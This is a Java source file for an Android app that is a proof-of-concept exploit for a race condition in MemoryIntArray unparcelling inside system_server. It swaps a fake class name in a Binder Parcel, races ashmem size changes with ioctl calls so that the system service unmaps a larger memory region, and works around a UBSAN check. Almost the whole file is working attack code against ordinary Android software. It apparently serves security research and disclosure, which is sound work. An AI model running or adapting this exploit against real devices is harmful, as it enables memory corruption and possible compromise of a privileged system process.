package com.example.laginimaineb.memoryintarrayracepoc;

import android.os.IBinder;
import android.os.Parcel;
import android.os.Parcelable;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.system.Os;
import android.util.AemoryIntArray;
import android.util.Log;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileDescriptor;
import java.io.FileReader;
import java.io.IOException;
import java.lang.reflect.Field;

import static android.system.OsConstants.O_RDWR;

public class MainActivity extends AppCompatActivity {

    // Used to load the 'native-lib' library on application startup.
    static {
        System.loadLibrary("native-lib");
    }

    /**
     * The size of the small ashmem region used.
     */
    private static final int SMALL_ASHMEM_SIZE = 512;


    /**
     * The size of the large ashmem region used.
     */
    private static final int LARGE_ASHMEM_SIZE = 0x1000000;

    /**
     * The logtag used.
     */
    private static final String TAG = "MemoryIntArrayRacePoc";

    /**
     * The command code used when transferring a Bundle to be unparcelled.
     */
    private static final int CONVERT_TO_TRANSLUCENT_TRANSACTION = IBinder.FIRST_CALL_TRANSACTION+174;

    /**
     * A flag indicating whether the race attempt has completed.
     */
    private volatile boolean finished = false;

    /**
     * Calls ASHMEM_SET_SIZE on the given file descriptor.
     * @param fd The descriptor
     * @param size The new size of the descriptor
     * @return The result of the ASHMEM_SET_SIZE ioctl
     */
    public native int setAshmemSize(int fd, int size);

    /**
     * Reads the given file fully.
     * @param file The file to read.
     * @return The string contents of the file.
     * @throws IOException If the file couldn't be read.
     */
    private static String readFully(File file) throws IOException {
        StringBuilder builder = new StringBuilder();
        BufferedReader reader = null;
        try {
            reader = new BufferedReader(new FileReader(file));
            String line;
            while ((line = reader.readLine()) != null)
                builder.append(line).append('\n');
            return builder.toString();
        } finally {
            if (reader != null)
                try {
                    reader.close();
                } catch (IOException ex) {
                    //Nothing more we can do at this point
                }
        }
    }

    /**
     * Returns the maximal value of a PID on the system.
     * @return The maximal value of a PID on the system.
     * @throws IOException If the PID file couldn't be read.
     */
    public int getMaxPid() throws IOException {
        return Integer.parseInt(readFully(new File("/proc/sys/kernel/pid_max")).trim());
    }

    /**
     * Tries to trigger the race condition in MemoryIntArray to cause it to unmap a larger region
     * than the one initially mapped, within system_server.
     *
     * @param array The AemoryIntArray instance to be modified and parcelled.
     * @param fd The file descriptor embedded in the MemoryIntArray
     * @param additionalFd The additional descriptor used to circumvent the UBSAN crash
     * @throws Exception If the exploit couldn't be executed.
     */
    public void doRace(AemoryIntArray array, Bundle bundle, final int fd, final int additionalFd) throws Exception {

        //Putting the poisoned object in a bundle
        bundle.putParcelable("obj", (Parcelable)array);

        IBinder amBinder = (IBinder)Class.forName("android.os.ServiceManager").getMethod("getService", String.class).invoke(null, "activity");
        final Parcel reply = Parcel.obtain();
        final Parcel data = Parcel.obtain();
        finished = false;

        //Starting the racer thread
        new Thread(new Runnable() {
            public void run() {
                boolean even = false;
                while (true) {
                    if (setAshmemSize(fd, even ? LARGE_ASHMEM_SIZE : SMALL_ASHMEM_SIZE) < 0) {

                        //Quick! The remote descriptor was mmap-ed, so decrease the size of the additional
                        //descriptor to survive the UBSAN check when the Parcel is recycled
                        setAshmemSize(additionalFd, SMALL_ASHMEM_SIZE);

                        //Cleanup
                        reply.recycle();
                        data.recycle();
                        finished = true;
                        Log.e(TAG, "Remote fd mapped!");
                        break;
                    }
                    even = !even;
                }
            }
        }).start();

        //Preparing the request
        data.writeInterfaceToken("android.app.IActivityManager");
        data.writeStrongBinder((IBinder)this.getClass().getMethod("getActivityToken").invoke(this));
        data.writeInt(1); //is bundle present?
        data.writeBundle(bundle);

        //Writing the additional descriptor to the parcel
        FileDescriptor desc = new FileDescriptor();
        Field descriptorField = desc.getClass().getDeclaredField("descriptor");
        descriptorField.setAccessible(true);
        descriptorField.setInt(desc, additionalFd);
        data.writeFileDescriptor(desc);

        //Rewinding the parcel to modify the internal class name to MemoryIntArray
        //This is done to prevent the current process from unparcelling the request in the Bundle
        //and by doing so, mapping in the ashmem fd (and in doing so, ruining the possibility for a
        //race condition)
        int pos = data.dataPosition();
        data.setDataPosition(2);
        int searchVal = ((Character.valueOf('A')  << 0)  |
                         (Character.valueOf('\0') << 8)  |
                         (Character.valueOf('e')  << 16) |
                         (Character.valueOf('\0') << 24));

        int replaceVal = ((Character.valueOf('M')  << 0)  |
                          (Character.valueOf('\0') << 8)  |
                          (Character.valueOf('e')  << 16) |
                          (Character.valueOf('\0') << 24));
        for (int i=2; i<pos; i+=4) {
            int val = data.readInt();
            if (val == searchVal) {
                data.setDataPosition(i);
                data.writeInt(replaceVal);
            }
        }
        data.setDataPosition(pos); //Restoring the original position

        //Sending the request
        try {
            amBinder.transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, reply, 0);
        } catch (Exception ex) {}

        //Waiting for the race to end
        while (!finished);

    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        //Creating an instance of the AemoryIntArray (the fake class which will be replaced in-place)
        AemoryIntArray arr = new AemoryIntArray(1, true, 0xABCDABCD, 0);

        //Trying to trigger the race condition repeatedly
        Bundle bundle = new Bundle();
        for (int i=0; i<10; i++) {
            try {
                //Creating two ashmem descriptors to be serialized
                FileDescriptor desc = Os.open("/dev/ashmem", O_RDWR, O_RDWR);
                int fd = (int) desc.getClass().getMethod("getInt$").invoke(desc);
                FileDescriptor additionalDesc = Os.open("/dev/ashmem", O_RDWR, O_RDWR);
                int additionalFd = (int) additionalDesc.getClass().getMethod("getInt$").invoke(additionalDesc);
                setAshmemSize(fd, SMALL_ASHMEM_SIZE);
                setAshmemSize(additionalFd, LARGE_ASHMEM_SIZE);

                //Setting the internal FD to the descriptor we'd like to race with
                arr.mFd = fd;

                //Attempting the race
                doRace(arr, bundle, fd, additionalFd);

                //Closing the descriptors
                Os.close(desc);
                Os.close(additionalDesc);
            } catch (Exception ex) {
                Log.e(TAG, "Race attempt failed", ex);
            }
        }
    }
}
